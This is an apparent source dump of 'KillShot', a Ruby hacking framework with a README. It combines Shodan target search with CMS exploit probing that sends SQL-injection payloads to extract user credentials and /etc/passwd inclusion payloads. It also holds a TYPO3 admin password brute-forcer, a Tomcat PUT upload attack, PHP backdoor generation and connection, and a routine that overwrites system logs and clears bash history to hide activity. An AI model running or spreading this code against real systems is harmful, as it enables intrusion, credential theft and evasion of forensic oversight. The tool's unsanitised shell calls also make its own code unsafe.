├── Killshot.rb ├── README.md ├── api.txt ├── bwa.rb ├── dns.txt ├── list.txt ├── setup.rb ├── sqlscan.rb └── x3scan.rb /Killshot.rb: -------------------------------------------------------------------------------- 1 | #/usr/bin/ruby -w 2 | 3 | =begin 4 | Powred By T.H.H 5 | The Head Hack Team (: 6 | =end 7 | require "rest-client" 8 | require "nokogiri" 9 | require "colorize" 10 | require "open-uri" 11 | require "net/http" 12 | require "socket" 13 | require 'shodan' 14 | system("cls") 15 | puts " 16 | 17 | ██╗ ██╗██╗██╗ ██╗ ███████╗██╗ ██╗ ██████╗ ████████╗ 18 | ██║ ██╔╝██║██║ ██║ ██╔════╝██║ ██║██╔═══██╗╚══██╔══╝ 19 | █████╔╝ ██║██║ ██║ ███████╗███████║██║ ██║ ██║ 20 | ██╔═██╗ ██║██║ ██║ ╚════██║██╔══██║██║ ██║ ██║ 21 | ██║ ██╗██║███████╗███████╗ ███████║██║ ██║╚██████╔╝ ██║ 22 | ╚═╝ ╚═╝╚═╝╚══════╝╚══════╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ 23 | ".red 24 | puts " 25 | Gather information 26 | About Targets 27 | ".green 28 | 29 | while true do 30 | print " track>>> : ".red 31 | $option = gets.chomp 32 | if $option == "exit" then 33 | break 34 | end 35 | if $option == "help" then 36 | 37 | puts 38 | 39 | puts "[site] MAKE YOUR TARGET".green 40 | puts "[help] show this MESSAGE".green 41 | puts "[targ] Search targets".green 42 | puts "[exit] exit the script".green 43 | puts "[uptd] Update KillShot".green 44 | puts "[anon] Run Anonymous Mode".green 45 | puts "[info] About killShot".green 46 | puts 47 | end 48 | if $option == "anon" then 49 | puts 50 | puts "ANONSURF START **** ".green.on_blue 51 | system("service tor start ") 52 | system("anonsurf start") 53 | puts "Press 99 to stop anonsurf service" 54 | end 55 | if $option == "99" then 56 | system("anonsurf stop service") 57 | end 58 | if $option == "targ" then 59 | puts "[1] Search Target Shodan".blue 60 | puts "[2] Shodan Port Scanner".blue 61 | end 62 | if $option == "2" then 63 | print "IP :: ".green 64 | targetportscan = gets.chomp 65 | $sourceshodan = open("https://www.shodan.io/host/#{targetportscan}").read 66 | f = 
File.open("#{targetportscan}.htm","w") 67 | f.puts $sourceshodan 68 | f.close 69 | print "[+]".green 70 | system("grep -a 'Ports open:' #{targetportscan}.htm | cut -d '=' -f 3 | cut -d '/' -f 1") 71 | end 72 | if $option == "1" then 73 | def bann() 74 | puts " "" 75 | ████████╗ █████╗ ██████╗ ██████╗ ███████╗████████╗ 76 | ╚══██╔══╝██╔══██╗██╔══██╗██╔════╝ ██╔════╝╚══██╔══╝ 77 | ██║ ███████║██████╔╝██║ ███╗█████╗ ██║ 78 | ██║ ██╔══██║██╔══██╗██║ ██║██╔══╝ ██║ 79 | ██║ ██║ ██║██║ ██║╚██████╔╝███████╗ ██║ 80 | ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ 81 | 82 | 83 | 84 | 85 | 86 | """ 87 | end 88 | bann() 89 | puts "Before you can use the Target, you need to have an API key account.shodan.io and add it to apii.txt" 90 | apii = open("api.txt") 91 | my_shodan_api = apii.read 92 | print "Search : " 93 | target = gets.chomp 94 | api = Shodan::Shodan.new("#{my_shodan_api}") 95 | result = api.search("#{target}") 96 | file = File.open("result.txt","w") do |f2| 97 | result['matches'].each{ |host| 98 | system("clear") 99 | bann() 100 | puts "-------------" 101 | puts host['ip_str'] 102 | f2.puts host['ip_str'] 103 | puts "--------------" 104 | } 105 | system("clear") 106 | bann() 107 | puts "[+] Success ! Target saved in result.txt".green 108 | system("pause>nul") 109 | end 110 | end 111 | if $option == "info" then 112 | puts " 113 | You Can use this tool to Spider your website and get important information and gather information automaticaly using whatweb-host-traceroute-dig-fierce-wafw00f or to Identify the cms and to find the vulnerability in your website using Cms Exploit Scanner && WebApp Vul Scanner Also You can use killshot to Scan automaticly multiple type of scan with nmap and unicorn . 
And With this tool You can Generate PHP Simple Backdoors upload it manual and connect to the target using killshot 114 | 115 | This Tool Bearing A simple Ruby Fuzzer Tested on VULSERV.exe And Linux Log clear script To change the content of login paths Spider can help you to find parametre of the site and scan xss and sql 116 | add shodan tools in the last update 117 | ".blue 118 | end 119 | if $option == "uptd" then 120 | system("git clone https://github.com/bahaabdelwahed/killshot.git") 121 | end 122 | if $option == "site" then 123 | 124 | print "Site : ".green 125 | $url = gets.chomp 126 | system("cls") 127 | system("clear") 128 | puts " 129 | .n . . n. 130 | . .dP dP 9b 9b. . 131 | 4 qXb . dX Xb . dXp t 132 | dX. 9Xb .dXb __ __ dXb. dXP .Xb 133 | 9XXb._ _.dXXXXb dXXXXbo. .odXXXXb dXXXXb._ _.dXXP 134 | 9XXXXXXXXXXXXXXXXXXXVXXXXXXXXOo. .oOXXXXXXXXVXXXXXXXXXXXXXXXXXXXP 135 | `9XXXXXXXXXXXXXXXXXXXXX'~ ~`OOO8b d8OOO'~ ~`XXXXXXXXXXXXXXXXXXXXXP' 136 | `9XXXXXXXXXXXP' `9XX' Hide `98v8P' Hack `XXP' `9XXXXXXXXXXXP' 137 | ~~~~~~~ 9X. .db|db. .XP ~~~~~~~ 138 | )b. .dbo.dP'`v'`9b.odb. .dX( 139 | 140 | 141 | ".red 142 | def banner() 143 | puts "{0} Spider ".green 144 | puts "{1} Web technologie " .green 145 | puts "{2} WebApp Vul Scanner" .green 146 | puts "{3} Port Scanner".green 147 | puts "{4} CMS Scanner".green 148 | puts "{5} Fuzzers ".green 149 | puts "{6} Cms Exploit Scanner ".green 150 | puts "{7} Backdoor Generation".green 151 | puts "{8} Linux Log Clear".green 152 | puts "{9} Find MX/NS".green 153 | puts 154 | end 155 | banner() 156 | while true do 157 | print " info>>> : ".green 158 | $web = gets.chomp 159 | 160 | if $web == "9" then 161 | $urlss= "#{$url}" 162 | linktestermsns = $urlss.slice! "www." 
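puts $urlss
# Fetch one record type (s = "MX" / "NS") for the current target from dns-api.org
# into "<n>.txt". curl is run through IO.popen with an argv array instead of a
# shell string, so a target containing shell metacharacters can no longer inject
# commands. The output file is always written (empty on failure) so the grep/cut
# pipeline and the cleanup below behave the same whether or not the lookup worked.
def mxns(s, n)
  body = begin
    IO.popen(["curl", "-s", "https://dns-api.org/#{s}/#{$urlss}"], &:read)
  rescue Errno::ENOENT
    "" # curl is not installed: leave an empty file so the pipeline still runs
  end
  File.write("#{n}.txt", body.to_s)
end
mxns("MX", "mx")
mxns("NS", "ns")
system("cls")
puts "[+] Email Server".green
# NOTE(review): the trailing `cut -d '0'` is meant to strip the MX priority, but it
# also truncates any mail host whose name contains a '0' -- confirm against the
# real dns-api.org output before relying on it.
system("cat mx.txt | grep value | cut -d ':' -f 2 | cut -d '0' -f 2")
puts "[+] Name Server".green
system("cat ns.txt | grep value | cut -d ':' -f 2 ")
File.delete("ns.txt", "mx.txt")
end

# Scans the target in $url for known CMS weaknesses. The front page is fetched
# once and its <meta name="generator"> tag decides which check list runs (TYPO3,
# Joomla, WordPress). The three detections are independent, so a page matching
# several generators runs every matching list, as before.
#
# Every check is a plain HTTP GET of a known path over port 80: a 200 only proves
# the path is served, not that the issue is exploitable, so hits are leads to
# verify by hand. Fixes over the previous version: each probe is rescued, so a
# connection error prints "[-]" instead of aborting the whole scan; the WordPress
# loop counter no longer has two `e == 12` branches (gravityforms was never
# reported and its "not found" label said "powerzoomer"); the TYPO3 brute force
# compares the password without its trailing newline and really stops on the
# first hit; `open` became `URI.open` (Kernel#open no longer opens URLs on
# Ruby 3 and would treat a target starting with "|" as a command).
class Exploitscanner
  # Entry point used by the "{6} Cms Exploit Scanner" menu item.
  # Returns nil; all results are printed.
  def scanner()
    $sourcex = URI.open("http://#{$url}").read
    scan_typo3 if $sourcex =~ /generator" content="TYPO3/
    scan_joomla if $sourcex =~ /generator" content="Joomla/
    scan_wordpress if $sourcex =~ /generator" content="WordPress/
    nil
  end

  private

  # ---------------------------------------------------------------- TYPO3 ----

  # Extension directories probed under /typo3conf/ext/ (duplicates removed).
  def typo3_extensions
    %w[crawler api_macmade be_acl css_select fl_header_slide gsi_slideshow
       slideshow twwc_pages pw_highslide_gallery static_info_tables
       yag_themepack_jquery formhandler gridelements typo3_console
       cron_ptaheutetoken cron_menustyle be_acl linkhandler cron_realurlconf
       typdom3 realurl ws_flexslider tt_address sr_freecaps
       cron_ptaheuteregistrationtoken cron_ptaheuterezeptursubst
       t3s_jslidernews additional_reports api_macmade phpmyadmin
       doc_indexed_search].uniq
  end

  # [extension, ext_tables.sql path, label] for the "Database Disclosure" step.
  def typo3_sql_files
    [
      ["crawler", "/typo3conf/ext/crawler/ext_tables.sql", "Crawler Extension 6.1.2"],
      ["twwc_pages", "/typo3conf/ext/twwc_pages/ext_tables.sql", "twwc_pages Extension 8.7.x"],
      ["yag_themepack_jquery", "/typo3conf/ext/yag_themepack_jquery/ext_tables.sql",
       "Themepack jQuery Extension 1.3.2"],
    ]
  end

  def scan_typo3
    puts <<~'BANNER'

       ████████╗██╗ ██╗██████╗ ██████╗ ██████╗ ██╗ ██╗████████╗
       ╚══██╔══╝╚██╗ ██╔╝██╔══██╗██╔═══██╗╚════██╗ ██║ ██║╚══██╔══╝
       ██║ ╚████╔╝ ██████╔╝██║ ██║ █████╔╝ ██║ █╗ ██║ ██║
       ██║ ╚██╔╝ ██╔═══╝ ██║ ██║ ╚═══██╗ ██║███╗██║ ██║
       ██║ ██║ ██║ ╚██████╔╝██████╔╝ ╚███╔███╔╝ ██║
       ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══╝╚══╝ ╚═╝

    BANNER
    $site = "http://#{$url}"
    # The backend lives under /typo3/; a 500 is accepted as well because some
    # installs error out on a bare directory request while still being TYPO3.
    unless [200, 500].include?(status_of("#{$site}/typo3/"))
      print "[-]".red
      puts "typo3 Not found"
      return
    end
    print "---[+]".green
    puts "Typo3 Found "
    if status_of("#{$site}/typo3/ext/") == 200
      print "----[+]".green
      puts "ExtensionPath can be without index #{$site}/typo3/ext/"
    end
    puts " [+] Extension Enumerations [+]".red
    typo3_extensions.each do |ext|
      next unless status_of("#{$site}/typo3conf/ext/#{ext}/") == 200
      print "[+] ".green
      puts "Found #{ext}"
    end
    puts " [+] Vulnrability scanner [+]".red
    puts "Weak password -Panel Brute Force".blue
    brute_force_panel("admin")
    puts "Database Disclosure ".blue
    typo3_sql_files.each do |ext, path, label|
      vull(ext, path, label, "Table structure")
      sleep 1
    end
  end

  # Tries each line of list.txt as the password for `user` on the TYPO3 backend
  # login form and stops at the first 302 (the redirect TYPO3 sends after a
  # successful login -- a heuristic, not a confirmed session). Returns true on a
  # hit. Note: the previous code posted each line with its trailing newline and
  # its `break` only left the RestClient block, so it never stopped.
  def brute_force_panel(user)
    File.foreach("list.txt") do |line|
      password = line.chomp
      print "[+]".blue
      puts "Test #{user} #{password} "
      response = RestClient.post("#{$site}/typo3/", { username: user, p_field: password }) { |r, _req, _res| r }
      if response.code == 302
        puts "Password Succes ".green
        return true
      end
      puts "Password Woring ".red
    end
    false
  rescue StandardError => e
    puts "brute force aborted: #{e.message}".red
    false
  end

  # Checks whether extension `ext` is installed and its `path` (an ext_tables.sql)
  # is served; when the body contains `tests` it is saved locally as
  # ext_tables.sql. `nam` is the label printed next to the [+]/[-] marker.
  # NOTE(review): every hit overwrites the same ext_tables.sql -- only the last
  # disclosed file survives.
  def vull(ext, path, nam, tests)
    return unless status_of("#{$site}/typo3conf/ext/#{ext}/") == 200
    aa = begin
      URI.open("#{$site}/#{path.delete_prefix('/')}").read
    rescue OpenURI::HTTPError, SocketError, SystemCallError
      nil
    end
    if aa.nil? || !aa.include?(tests)
      print "[-]".red
      puts nam
    else
      print "[+]".green
      puts nam
      puts " --- >Download sql file "
      File.open("ext_tables.sql", "w") { |ff| ff.puts aa }
    end
  end

  # ------------------------------------------------------ Joomla / WordPress --

  # One probe per entry:
  #   path    -- request path on the target (with or without a leading "/")
  #   hit     -- which status counts as present: :le300 (<= 300), :le302 (<= 302),
  #              anything else means exactly 200
  #   found   -- lines printed on a hit (first green, the rest blue);
  #              "%{base}" / "%{path}" expand to the target and the probed path
  #   missing -- lines printed otherwise (red unless missing_colour says
  #              otherwise); absent = stay silent, as the old admin check did
  def joomla_checks
    [
      { path: "/administrator/index.php", hit: :le300,
        found: [" Admin panel -- > %{base}/%{path}"] },
      { path: "/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=",
        found: ["[+] Com Media File Upload", " --> %{base}%{path}"],
        missing: ["[-] Com Media File Upload"] },
      { path: "index.php?option=com_jdownloads&Itemid=0&view=upload",
        found: ["[+] Com jdownloads File Upload",
                " --> #https://packetstormsecurity.com/files/101522/Joomla-jDownloads-1.0-Shell-Upload.html",
                " --> %{base}%{path}"],
        missing: ["[-] Com jdownloads File Upload"] },
      { path: "/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload",
        found: ["[+] Com_fabrik Upload Shell", " --> https://cxsecurity.com/issue/WLB-2017120085 #"],
        missing: ["[-] Com_fabrik Upload Shell"] },
      { path: "/index.php?option=com_foxcontact&view=foxcontact&Itemid=113",
        found: ["[+] Com foxcontact Arbitrary File Upload", " --> https://cxsecurity.com/issue/WLB-2016050072 #"],
        missing: ["[-] Com foxcontact Arbitrary File Upload"] },
      { path: "/index.php?option=com_adsmanager&task=upload&tmpl=component",
        found: ["[+] Com adsmanager Arbitrary File Upload ", " --> https://cxsecurity.com/issue/WLB-2016050072 #"],
        missing: ["[-] Com adsmanager Arbitrary File Upload"] },
      { path: "/index.php?option=com_users&view=registration",
        found: ["[+] Com User ", " --> %{base}%{path} #"],
        missing: ["[-] Com User"] },
      { path: "/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=",
        found: ["[+] Com web links ", " --> %{base}%{path} #"],
        missing: ["[-] Com web links "] },
      # This probe sends an actual UNION SELECT payload to the target, not just
      # a path check.
      { path: "/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999%20union%20select%201,concat_ws(0x3a,username,password),3,4,5%20from%20jos_users/*",
        found: ["[+] Com_content' Component 'ItemID' Parameter SQL Injection ",
                " --> https://www.securityfocus.com/bid/36064/exploit"],
        missing: ["[-] Com_content' Component 'ItemID' Parameter SQL Injection "] },
      { path: "mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html",
        found: ["[+] Com_content File Upload Vulnerability ", " --> https://0day.today/exploit/14165"],
        missing: ["[-] Com_content File Upload Vulnerability "] },
      { path: "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20",
        found: ["[+] COM_JCE ", " --> https://cxsecurity.com/issue/WLB-2018050200"],
        missing: ["[-] COM_JCE "] },
    ]
  end

  def wordpress_checks
    [
      { path: "/readme.html", hit: :le302,
        found: ["Wordpress version here : %{base}/readme.html !"],
        missing: ["version not found"], missing_colour: nil },
      # The two LFI probes below carry a ../etc/passwd payload.
      { path: "/wordpress/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd",
        found: ["[+] WordPress Plugin Localize My Post 1.0 - Local File Inclusion Found"],
        missing: ["[-] WordPress Plugin Localize My Post 1.0 - Local File Inclusion Not Found"] },
      { path: "/wp-content/plugins/wp-events-calendar/public/ajax/getEventsList.php?year=2018&month=5&day=1&calendar_id=1&pag=1",
        found: ["[+] Wordpress Plugin Events Calendar - SQL Injection ! ", " --- > https://www.exploit-db.com/raw/44785/"],
        missing: ["[-] Wordpress Plugin Events Calendar - SQL Injection !"] },
      { path: "/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php",
        found: ["[+] WordPress Plugin Peugeot Music - Arbitrary File Upload ! ", " --- > https://www.exploit-db.com/raw/44737/"],
        missing: ["[-] WordPress Plugin Peugeot Music - Arbitrary File Upload !"] },
      { path: "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd",
        found: ["[+] Wordpress Plugin Site Editor 1.1.1 - Local File Inclusion ! ", " --- > https://www.exploit-db.com/raw/44340/"],
        missing: ["[-] Wordpress Plugin Site Editor 1.1.1 - Local File Inclusion"] },
      # NOTE(review): the WPshop reference repeats the Site Editor exploit-db id
      # (44340) -- verify the link.
      { path: "wp-content/themes/WPStore/upload/index.php",
        found: ["[+] WordPress WPshop eCommerce Arbitrary File Upload Vulnerability ! ", " --- > https://www.exploit-db.com/raw/44340/"],
        missing: ["[-] WordPress WPshop eCommerce Arbitrary File Upload Vulnerability"] },
      { path: "wp-content/plugins/sexy-contact-form/includes/fileupload/index.php",
        found: ["[+] WordPress Plugin Creative Contact Form - Arbitrary File Upload ! ", " --- > https://www.exploit-db.com/raw/34922/"],
        missing: ["[-] WordPress Plugin Creative Contact Form - Arbitrary File Upload "] },
      { path: "wp-content/plugins/lazy-seo/lazyseo.php",
        found: ["[+] Wordpress Lazy SEO plugin Shell Upload Vulnerability ! ", " --- > https://cxsecurity.com/issue/WLB-2017080132"],
        missing: ["[-] Wordpress Lazy SEO plugin Shell Upload Vulnerability "] },
      { path: "wp-content/plugins/easy-comment-uploads/upload-form.php",
        found: ["[+] Wordpress easy comment uploads ! ", " --- > https://cxsecurity.com/issue/WLB-2017080132"],
        missing: ["[-] Wordpress easy comment uploads "] },
      { path: "wp-symposium/server/file_upload_form.php",
        found: ["[+] Wordpress WP Symposium 14.11 Shell Upload Vulnerability ! ", " --- > Metasploit exploit/unix/webapp/wp_symposium_shell_upload"],
        missing: ["[-] Wordpress WP Symposium 14.11 Shell Upload Vulnerability "] },
      { path: "wp-content/uploads/wp-security-audit-log/", hit: :le300,
        found: ["[+] WordPress Plugin WP Security Audit Log 3.1.1 - SID ! ", " --- > https://www.exploit-db.com/exploits/44371/"],
        missing: ["[-] WordPress Plugin WP Security Audit Log 3.1.1 - Sensitive Information Disclosure "] },
      { path: "/wp-admin/admin.php?page=powerzoomer_manage", hit: :le300,
        found: ["[+] powerzoomer ! ", " --- > http://www.exploit4arab.org/exploits/399"],
        missing: ["[-] powerzoomer "] },
      { path: "/?gf_page=upload", hit: :le300,
        found: ["[+] gravityforms ! ", " --- > https://www.exploit-db.com/exploits/39969/"],
        missing: ["[-] gravityforms "] },
    ]
  end

  def scan_joomla
    run_checks(joomla_checks)
  end

  def scan_wordpress
    run_checks(wordpress_checks)
  end

  # Probes every entry of `checks` against $url and prints the matching lines.
  def run_checks(checks)
    checks.each do |check|
      code = status_of_path($url, check[:path])
      hit = case check[:hit]
            when :le300 then !code.nil? && code <= 300
            when :le302 then !code.nil? && code <= 302
            else code == 200
            end
      lines = hit ? check[:found] : check[:missing]
      next if lines.nil?
      lines.each_with_index do |line, i|
        text = line.gsub("%{base}") { $url }.gsub("%{path}") { check[:path] }
        colour = hit ? (i.zero? ? :green : :blue) : check.fetch(:missing_colour, :red)
        puts(colour ? text.public_send(colour) : text)
      end
    end
  end

  # HTTP status of GET http://host/path as an Integer, nil when the request
  # fails (DNS, refused, timeout). Paths in the tables are written with and
  # without a leading "/", so the slash is normalised here instead of sending
  # "//path" as the old code did. Redirects are not followed.
  def status_of_path(host, path)
    Net::HTTP.get_response(host, "/#{path.delete_prefix('/')}").code.to_i
  rescue StandardError
    nil
  end

  # Same for a full URL.
  def status_of(url)
    Net::HTTP.get_response(URI.parse(url)).code.to_i
  rescue StandardError
    nil
  end
end

# "{0} Spider": resolves the target and lists every <a href> and <img src> on
# its front page. The page is fetched once (the old code downloaded it twice).
# An unresolvable host prints a message and returns instead of raising.
def domains()
  print " ip For #{$url} :: ".green
  begin
    $ipaddr = p Addrinfo.ip("#{$url}").ip_address
  rescue SocketError => e
    puts "could not resolve #{$url}: #{e.message}".red
    return
  end
  puts "Links And Paths :: ".red
  $h = Nokogiri::HTML(URI.open("http://#{$url}").read)
  puts "Related domains and Parameters ::".red
  $h.xpath("//a").each { |anchor| puts anchor['href'] }
  puts "IMAGE FILES :: ".red
  $h.xpath("//img").each { |image| puts image['src'] }
end

# "{4} CMS Scanner": fingerprints the CMS from the <meta name="generator"> tag
# of the front page. The if/elsif chain and the method are closed by the two
# `end`s that follow on the next source line.
def cmsscanner()
  $source = URI.open("http://#{$url}").read
  if ($source =~ /generator" content="WordPress/)
    puts "#{$url} ---- > use wordpress".green
  elsif ($source =~ /generator" content="Joomla/)
    puts "#{$url} ---- > use Joomla".green
  elsif ($source =~ /generator" content="Drupal/)
    puts "#{$url} ---- > use Drupal".green
  elsif ($source =~ /generator" content="vBulletin/)
    puts "#{$url} ---- > use vBulletin".green
  elsif ($source =~ /generator" content="TYPO3/)
    puts "#{$url} ---- > use TYPO3".green
  else
    puts "UNKNOW CMS !"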
468 | end 469 | end 470 | #------------------------ Eazy Fuzzer For beginner Tested In VulnServer --------------- 471 | if $web == "5" then 472 | print "Ip : " 473 | $fip = gets.chomp 474 | print "Port : " 475 | $fport = gets.chomp 476 | $o = TCPSocket.open("#{$fip}",$fport) # Vuln server ip : 127.0.0.1 port : 9999 477 | while true do 478 | $b = (1..90) 479 | $a = ["A"] 480 | $c = 100 481 | for i in $b do 482 | puts "Fuzzing with #{$c} bits" 483 | $t = $a.append("A"*$c) 484 | $c = $c + 100 485 | $o.puts("TRUN /.:/",$t) #VulnServer Test 486 | end 487 | end 488 | end 489 | 490 | if $web == "7" then 491 | system("clear") 492 | puts "{1} Generate Shell".blue 493 | puts "{2} Connect Shell".blue 494 | puts 495 | while true do 496 | print "GENERATE >>".green 497 | backdoor = gets.chomp 498 | if backdoor == "1" then 499 | system("ruby bwa.rb track.php ") 500 | print "track.php File Has been generated Upload it to site ( D'ont change the name) !" 501 | system("pause") 502 | elsif backdoor == "2" 503 | 504 | puts " Sure To Use #{$url}/track.php site y/n : " 505 | 506 | elsif backdoor == "y" 507 | system("ruby bwa.rb start #{$url}/track.php") 508 | elsif backdoor == "n" 509 | break 510 | 511 | 512 | end 513 | end 514 | 515 | end 516 | if $web == "2" then 517 | 518 | system("clear") 519 | puts "--- ------ --------- Exploit Scanner L'ets Hack -------- ------ ".green 520 | puts 521 | puts "{1} Xss scanner".blue 522 | puts "{2} Sql Scanner".blue 523 | puts "{3} Tomcat RCE".blue 524 | print "WebApp >>".green 525 | webapp = gets.chomp 526 | if webapp == "3" then 527 | system("clear") 528 | puts "--- ------ --------- APACHE TOMCAT RCE -------- ------ ".green 529 | system("curl -X PUT 'http://#{$url}/test.jsp' -d 'Injected By me' ") 530 | system("curl -X GET 'http://#{$url}/test.jsp'") 531 | elsif webapp == "1" 532 | print "Parametre To Test :: ".green 533 | parm0 = gets.chomp 534 | puts "this is a automatique usage you can use the x3scan.rb script and add more than one website Click 
OK" 535 | system("pause") 536 | system("echo http://#{$url}#{parm0} > sites.txt") 537 | system("ruby x3scan.rb sites.txt") 538 | elsif webapp == "2" 539 | print "Parametre To Test :: ".green 540 | parm = gets.chomp 541 | puts "this is a automatique usage you can use the sqlscan.rb script and add more than one website Click OK" 542 | system("pause") 543 | system("echo http://#{$url}#{parm} > sites.txt") 544 | system("ruby sqlscan.rb sites.txt") 545 | 546 | 547 | end 548 | end 549 | if $web == "8" then 550 | system("clear") 551 | system("cls") 552 | print " 553 | _____ ______ __ 554 | | |_.-----.-----.| | |.-----.---.-.----. 555 | | | _ | _ || ---| || -__| _ | _| 556 | |_______|_____|___ ||______|__||_____|___._|__| 557 | |_____| 558 | " 559 | linuxlog = [ 560 | 561 | '/etc/httpd/logs/access_log', 562 | '/etc/httpd/logs/access.log', 563 | '/etc/httpd/logs/error_log', 564 | '/etc/httpd/logs/error.log', 565 | '/var/log/apache2/access_log', 566 | '/var/log/apache2/access.log', 567 | '/var/log/apache2/error_log', 568 | '/var/log/apache2/error.log', 569 | '/var/log/apache/access_log', 570 | '/var/log/apache/access.log', 571 | '/var/log/auth.log', 572 | '/var/log/dpkg.log', 573 | '/var/log/faillog', 574 | '/var/log/httpd/access_log', 575 | '/var/www/logs/access.log', 576 | '/var/www/logs/access_log', 577 | '/var/webmin/miniserv.log', 578 | '/var/run/utmp', 579 | '/var/log/yum.log', 580 | '/var/log/xferlog', 581 | ] 582 | 583 | linuxlog.each do |log| 584 | if File.exist?(log) then 585 | puts "The #{log} log has been changed" 586 | del = %x!echo 194.190.86.119 - frank [10/Oct/2000:13:55:36 -0700] "GET /apache_pb.gif HTTP/1.0" 200 2326 > #{log}! 587 | 588 | else 589 | puts "The #{log} directry NOt found" 590 | end 591 | 592 | end 593 | 594 | puts "SUPERR All log deleted YOU ARE NINJA !!!!" 
595 | 596 | system("PAUSE >NULL") 597 | system("cls") 598 | 599 | 600 | print "Clearing The Bash history " 601 | system("sudo history -c && history -w") 602 | 603 | 604 | 605 | end 606 | 607 | if $web == "banner" then 608 | 609 | banner() 610 | end 611 | if $web == "help" then 612 | puts "[ banner] Show main page".blue 613 | puts "[ exit ] Exit ".blue 614 | puts "[ help ] Show this message".blue 615 | end 616 | 617 | if $web == "4" then 618 | 619 | cmsscanner() 620 | end 621 | if $web == "0" then 622 | domains() 623 | end 624 | if $web == "6" then 625 | s = Exploitscanner.new 626 | puts s.scanner() 627 | end 628 | 629 | 630 | 631 | if $web == "exit" then 632 | break 633 | end 634 | if $web == "1" then 635 | system("cls") 636 | system("clear") 637 | puts " [+]Basic WhatWeb Information :: ".green 638 | system("whatweb #{$url}") 639 | 640 | puts " [+]Host Result :: ".green 641 | system("host #{$url}") 642 | puts " [+]Dig Result About Dns:: ".green 643 | system("dig 8.8.8.8 #{$url} | grep -e 'A' ") 644 | 645 | puts " [+]Trying zone transfer and Brute force :: ".green 646 | system("fierce -dns #{$url} -w dns.txt") 647 | puts " [+]Traceroutr Result :: ".green 648 | system("traceroute #{$url}") 649 | puts " [+]Firewall And IDS Detect :: ".green 650 | system("wafw00f #{$url}") 651 | end 652 | if $web == "3" then 653 | system("clear") 654 | system("cls") 655 | puts " 656 | 657 | _ _____ 658 | /\ | | / ____| 659 | / \ _ _| |_ ___| (___ ___ __ _ _ __ _ __ ___ _ __ 660 | / /\ \| | | | __/ _ \\___ \ / __/ _` | '_ \| '_ \ / _ \ '__| 661 | / ____ \ |_| | || (_) |___) | (_| (_| | | | | | | | __/ | 662 | /_/ \_\__,_|\__\___/_____/ \___\__,_|_| |_|_| |_|\___|_| 663 | 664 | 665 | " 666 | puts "[0] Nmap Scan".green 667 | puts "[1] Unicorn Scan".green 668 | while true do 669 | print "Scanner >>" 670 | scanner = gets.chomp 671 | if scanner == "0" then 672 | puts 673 | puts "[2] Nmap Os Scan ".blue 674 | puts "[3] Nmap TCP Scan".blue 675 | puts "[4] Nmap UDB Scan ".blue 676 | puts "[5] 
Nmap All scan".blue 677 | puts "[6] Nmap Http Option Scan ".blue 678 | puts "[7] Nmap Live target In Network".blue 679 | 680 | 681 | elsif scanner == "1" 682 | puts 683 | puts "[8] Services OS ".blue 684 | puts "[9] TCP SYN Scan on a whole network ".blue 685 | puts "[01] UDP scan on the whole network " .blue 686 | elsif scanner == "2" 687 | system("nmap -sS -O #{$url}") 688 | elsif scanner == "3" 689 | system("nmap -Pn -sT -sV -p1-65535 #{$url}") 690 | elsif scanner == "4" 691 | system("nmap -sU -sV #{$url}") 692 | elsif scanner == "5" 693 | system("nmap -A #{$url}") 694 | elsif scanner == "6" 695 | system("nmap -Pn -p80,443 --script http-methods -sC #{$url}") 696 | elsif scanner == "7" 697 | print "Your Router Ip : " 698 | ipp = gets.chomp 699 | system("nmap -sn #{ipp}/24 ") 700 | elsif scanner == "8" 701 | system("unicornscan #{$url} –Iv") 702 | elsif scanner == "9" 703 | print "Your Router Ip : " 704 | ipp = gets.chomp 705 | system("unicornscan -msf -v -I #{ipp}/24") 706 | elsif scanner == "01" 707 | print "Your Router Ip : " 708 | ipp = gets.chomp 709 | system("unicornscan –mU –v –I #{ipp}/24") 710 | elsif scanner == "exit" 711 | break 712 | else 713 | system("#{scanner}") 714 | end 715 | end 716 | end 717 | 718 | end 719 | 720 | end 721 | end 722 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # KILLSHOT 2 | A Penetration Testing Framework, Information gathering tool & Website Vulnerability Scanner 3 | 4 | **Why KillShot** ? 5 | 6 | You Can use this tool to Spider your website and get important information and gather information automaticaly using 7 | whatweb-host-traceroute-dig-fierce-wafw00f or to Identify the cms and to find the vulnerability in your website using 8 | Cms Exploit Scanner && WebApp Vul Scanner Also You can use killshot to Scan automaticly multiple type of scan with nmap and unicorn . 
And with this tool you can generate simple PHP backdoors, upload them manually and connect to the target using KillShot -- only on systems you are authorised to test.

This tool carries a simple Ruby fuzzer tested on VULSERV.exe and a Linux log-clear script that overwrites the content of common log paths.
Note: the log-clear option acts on the machine KillShot itself is running on (it checks the paths with a local `File.exist?`), not on the remote target, and it also overwrites binary files such as /var/run/utmp and /var/log/faillog -- do not run it on a box whose logs you need.
The spider can help you find the parameters of the site and scan for XSS and SQL injection.

![killshot-logo_v1](https://user-images.githubusercontent.com/19738278/47605704-7eaab180-d9f9-11e8-97cc-74fad3dc152c.png)




# Help option

![help](https://user-images.githubusercontent.com/19738278/48301246-f6dda080-e4ea-11e8-9def-5785fce2653a.JPG)


# Use Shodan by the targ option
Create an account here [Register](https://account.shodan.io/register), get your API key [Shodan API](https://account.shodan.io/) and put it in api.txt (that is the file the code reads, even though the in-tool prompt still says "apii.txt").
< only your API key should be in api.txt -- nothing else, and keep that file out of version control >
Use targ to search for vulnerable targets in the Shodan database.

![search](https://user-images.githubusercontent.com/19738278/48301291-ed086d00-e4eb-11e8-905c-86b9807e3234.JPG)

